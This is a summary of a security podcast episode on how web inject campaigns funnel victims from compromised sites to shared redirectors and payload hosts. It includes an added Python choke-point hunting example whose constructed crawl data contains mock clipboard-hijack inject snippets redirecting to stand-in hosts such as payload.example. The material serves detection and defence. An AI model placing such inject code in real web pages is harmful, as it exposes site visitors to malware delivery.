CyberWire Daily: "Caught in the Funnel" [Research Saturday]
Date: January 24, 2026
Host: Dave Bittner
Guest: Andrew Northern, Principal Security Researcher at Censys
Episode Overview
This Research Saturday episode dives deep into the evolving landscape of web-based cyberattacks, focusing on the "funneling" behavior observed in large-scale inject-based campaigns. Dave Bittner interviews Andrew Northern about his research, "From Evasion to Exploiting the Funneling Behavior of Injects," which uncovers how attackers leverage massive numbers of compromised websites to steer victims toward key infrastructure choke points—making attacks both scalable and difficult to block.
Key Discussion Points and Insights
The Shift to Web-Based Delivery
- Threat Evolution: Attackers are increasingly using web technologies for delivering both lures and malicious payloads, moving away from static methods like traditional email-based attacks.
- Quote:
"We're seeing adoption of web technologies as the way that threat actors are choosing to deliver both lures and payloads as opposed to traditional means of perhaps delivering static payloads through traditional avenues such as email."
— Andrew Northern (02:08)
What Are "Injects"?
- Definition: Injects refer to pieces of malicious code inserted into legitimate websites, often without the owner's knowledge.
- Attackers compromise sites (via software vulnerabilities or credential stuffing) and inject code.
- The site appears normal to owners and users until the attack is triggered.
- Quote:
"So when I'm speaking of injects, I'm speaking of injected malicious code that was not intended to be there by the rightful owner of the website."
— Andrew Northern (03:11)
Funneling Behavior Explained
- Attack Flow: Thousands of compromised sites (the "edge") route victims through intermediate redirectors/loaders, then to a small set of final payload delivery sites (the "choke points").
- This funnel-like structure increases the campaign’s reach while concentrating the actual malicious infrastructure.
- Quote:
"Large numbers of these compromised or low value sites are wired to steer victims into a much smaller set of shared infrastructure."
— Andrew Northern (05:00)
Importance of Choke Points
- Defensive Focus: With so many compromised sites, tracking each one individually is impractical.
- By identifying the relatively few shared redirect points (choke points), defenders can more effectively leverage their detection and blocking resources.
- Quote:
"By focusing on these choke points...defenders are better positioned to use their tools to protect themselves, their users and their domains."
— Andrew Northern (05:59)
Attack Chain Identification Methodology
Andrew Northern’s Five-Step Approach:
- Find Seed Patterns: Use anomalies or incident reports to identify initial suspicious activity (e.g., fake CAPTCHA templates, characteristic script names).
- Scale Search: Use content matching (exact and fuzzy) against large datasets to identify likely malicious sites.
- Graph the Attack Chain: Map out relationships between injected code, the next redirect, and shared resources.
- Locate Choke Points: Identify where large numbers of infected sites lead to a small set of key redirectors/loaders.
- Manual Validation: Simulate the attack as an end user to confirm chains lead to the intended final payload.
- Quote:
"I'll go ahead and hunt based upon the choke points...make sure that while I'm walking those chains manually...I am ultimately reaching those payloads."
— Andrew Northern (09:38)
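The five steps above, worked through end to end in Python as an added example (this is not code from Censys or from Andrew Northern's research, and it does not use Censys data). It runs over a small crawl sample constructed for this example: every hostname, script path and snippet is invented, the seed is a made-up clipboard-hijack string standing in for a fake-CAPTCHA template, the fuzzy measure is `difflib`'s similarity ratio over a sliding window after light normalization, and the 0.85 threshold and "at least two edge sites" cut-off are assumptions to tune against real data. It shows why the funnel matters for hunting: four edge sites with three differently written copies of the same inject collapse to one shared redirector and one payload host.

```python
"""Choke-point hunt: seed match -> fuzzy scale-out -> chain graph -> choke
points -> chains to validate by hand. Added example; all data constructed."""
import difflib
import re
from collections import defaultdict

# Constructed crawl rows of (site, resource_url, body). Hosts, paths and
# snippets are invented for this example, not indicators from the report.
SEED = "navigator.clipboard.writeText(cmd);top.location.replace("
CRAWL = [
    # injects buried in auxiliary libraries rather than the main page
    ("site-a.example", "https://site-a.example/js/slick.min.js",
     "/* slick */(function(){})();navigator.clipboard.writeText(cmd);"
     "top.location.replace('https://hop1.example/v/');"),
    ("site-b.example", "https://site-b.example/wp-content/forms.js",
     "window.onload=function(){};navigator.clipboard.writeText(cmd) ;"
     "top.location.replace ('https://hop1.example/v/');"),
    ("site-d.example", "https://site-d.example/js/gallery.js",
     "var g=new Gallery();navigator['clipboard']['writeText'](cmd);"
     "top['location'].replace('https://hop1.example/v/');"),
    # older style: inject straight in the page, and a slightly different variant
    ("site-c.example", "https://site-c.example/index.html",
     "<script>navigator.clipboard.writeText(c);"
     "top.location.replace('https://hop2.example/a');</script>"),
    # benign control row
    ("site-e.example", "https://site-e.example/js/analytics.js",
     "ga('send','pageview');"),
    # the shared redirectors the edge sites funnel into
    ("hop1.example", "https://hop1.example/v/",
     "<script>location.href='https://payload.example/update.js';</script>"),
    ("hop2.example", "https://hop2.example/a",
     "<script>location.href='https://payload.example/update.js';</script>"),
]
URL_RE = re.compile(r"https?://([\w.-]+)")


def normalize(js):
    """Drop whitespace and fold obj['prop'] into obj.prop so re-spaced or
    bracket-notation variants still line up with the seed."""
    return re.sub(r"\['(\w+)'\]", r".\1", re.sub(r"\s+", "", js))


def exact_hits(rows, seed=SEED):
    """Step 1: the seed pattern exactly as first observed."""
    return {site for site, _, body in rows if seed in body}


def fuzzy_score(seed, body):
    """Best similarity of the seed against any same-length window of body."""
    seed, body = normalize(seed), normalize(body)
    n = len(seed)
    if len(body) <= n:
        return difflib.SequenceMatcher(None, seed, body).ratio()
    return max(difflib.SequenceMatcher(None, seed, body[i:i + n]).ratio()
               for i in range(len(body) - n + 1))


def fuzzy_hits(rows, seed=SEED, threshold=0.85):
    """Step 2: scale out to the variants a verbatim match misses."""
    return {site for site, _, body in rows if fuzzy_score(seed, body) >= threshold}


def build_graph(rows):
    """Step 3: edge site -> every other host its body points at."""
    graph = defaultdict(set)
    for site, _, body in rows:
        graph[site].update(h for h in URL_RE.findall(body) if h != site)
    return graph


def walk(graph, start):
    """Follow one chain until a node with no outbound hop (the candidate
    payload host) or a cycle; first hop alphabetically if there are several."""
    path, seen = [start], {start}
    while graph.get(path[-1]):
        nxt = sorted(graph[path[-1]])[0]
        if nxt in seen:
            break
        path.append(nxt)
        seen.add(nxt)
    return path


def choke_points(graph, sources, min_sources=2):
    """Step 4: hosts reached by at least min_sources distinct edge sites,
    widest coverage first. Redirectors and payload hosts both surface."""
    reach = defaultdict(set)
    for src in sources:
        for host in walk(graph, src)[1:]:
            reach[host].add(src)
    ranked = [(h, len(s)) for h, s in reach.items() if len(s) >= min_sources]
    return sorted(ranked, key=lambda hs: (-hs[1], hs[0]))


def chains_to_validate(graph, sources):
    """Step 5 input: one full chain per edge site to reproduce as a user."""
    return {src: walk(graph, src) for src in sorted(sources)}


if __name__ == "__main__":
    suspects, g = fuzzy_hits(CRAWL), build_graph(CRAWL)
    print("exact:", sorted(exact_hits(CRAWL)), "fuzzy:", sorted(suspects))
    print("choke points:", choke_points(g, suspects))
    for chain in chains_to_validate(g, suspects).values():
        print(" -> ".join(chain))
```

The exact match finds only the first copy; the fuzzy pass picks up the re-spaced, bracket-notation and `(c)` variants while leaving the analytics control alone. Ranking reachable hosts by how many edge sites funnel into them puts the payload host first (all four) and the shared redirector second (three of four), which is the block list a defender would act on instead of chasing every compromised site. The last step only lists the chains; reproducing them in a real browser remains manual, as the research describes.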
Patterns and Trends Across Campaigns
- Shared Techniques: Even among different actor groups, techniques are copied, and whatever method is currently in vogue propagates rapidly.
- Injection Evolution: Attackers have shifted from obvious scripts in main page headers to embedding payloads in auxiliary JavaScript libraries loaded by the page (e.g., for slideshows or forms).
- Quote:
"Threat actors were very predictably moving to the same JavaScript library over and over again and putting the code in there that will rotate over time."
— Andrew Northern (11:31)
Monitoring and Defensive Recommendations
- Know Your Baseline: Defenders must understand normal behavior on endpoints to detect anomalies.
- Windows Policy Example: Associate .js files with a text editor (e.g., Notepad) instead of the Windows Script Host, so a user who is lured into downloading a .js payload opens it as text rather than executing it.
- Quote:
"Have it associate with something that would make it benign, like a notepad or text editor. So if someone is lured into...downloading a payload...it would not infect the system..."
— Andrew Northern (14:49)
Trends: Increasing Prevalence and Innovation
- Growing Use: Web-based inject attacks are more common than ever, with threat actors shifting from binaries to web-based lures.
- Popular Lures:
- Fake CAPTCHA: Users conditioned to solve CAPTCHAs are tricked into actions that execute payloads (e.g., pasting attacker-placed commands from the clipboard).
- Fake Updates: Fake browser/software update prompts exploit users’ security training to deliver malware.
- Quotes:
"The biggest one that I've been seeing over the past year or so is a fake captcha...The threat actors are preying upon our conditioning..."
— Andrew Northern (16:33)
"Traditionally...a fake update...telling you that a critical piece of software on your computer is out of date."
— Andrew Northern (17:43)
Where Is the Threat Heading?
- Persistence and Sophistication: Attacks are evolving, with techniques like "EtherHiding" storing payloads or redirect targets in blockchain smart contracts that the injected HTML/JavaScript reads at runtime, making takedown nearly impossible.
- Quote:
"They're now using part of the blockchain as well...that ledger has objects on it called smart contracts...that can be called from the HTML and JavaScript to read the contents...it's really hard to take these types of things down."
— Andrew Northern (19:13)
Threat Actor Sophistication
- Dual Landscape:
- Apex Predators: Highly skilled, rapidly innovating threat actors lead the charge, often motivated by financial gain or selling access.
- Copycats: Widespread availability of AI tools like ChatGPT has lowered the bar, leading to an influx of new, less-skilled actors.
- Impact: The increased volume and similarity in attack methods muddies attribution efforts for researchers.
- Quote:
"The barrier to entry...has greatly been lowered. So now we're seeing a lot of copycats...it also muddies the water for researchers who are trying to track and do attribution..."
— Andrew Northern (21:48)
Memorable Quotes and Timestamps
- On funneling attacks:
"Those choke points are important because...the number of infected or injected sites...is astronomical. There are at any given time...tens of thousands of these compromised sites." — Andrew Northern (05:59)
- On attacker adaptation:
"I've seen threat actor groups that were using traditional means...pivoted to start...using these web based attacks." — Andrew Northern (15:57)
- On fake CAPTCHA lures:
"Threat actors are preying upon our conditioning to interact with these captchas...commands right on our clipboard." — Andrew Northern (16:35)
- On the future threat:
"I don't think that they're going to be going anywhere. And the difficulty for defenders in tracking and reproducing these steps is becoming more difficult..." — Andrew Northern (20:09)
Important Timestamps
- 02:08 — Shift towards web-based attacks
- 03:11 — Definition of injects
- 05:00 — Explaining funneling and choke points
- 06:58 — Tracing attack chains (five-step method)
- 14:22 — Defensive recommendations
- 15:57 — Prevalence and attacker adaptation
- 16:33 — Fake CAPTCHA lure technique
- 19:13 — The "EtherHiding" blockchain-based technique
- 21:09 — Threat actor sophistication, AI’s role in proliferation
Conclusion
Takeaways:
Web-based inject attacks are growing in prevalence and sophistication, exploiting both technological vulnerabilities and human behavior. Focusing on choke points within the attack funnel can be an effective mitigation strategy. The future points toward more persistent and evasive campaigns, especially as threat actors increasingly leverage innovative technologies like blockchain and AI tools.
Guest: Andrew Northern’s research provides essential insights for defenders, highlighting both technical detection strategies and the importance of understanding user behavior and baseline system operations.
For further detail: See the full research report: From Evasion to Exploiting the Funneling Behavior of Injects by Censys.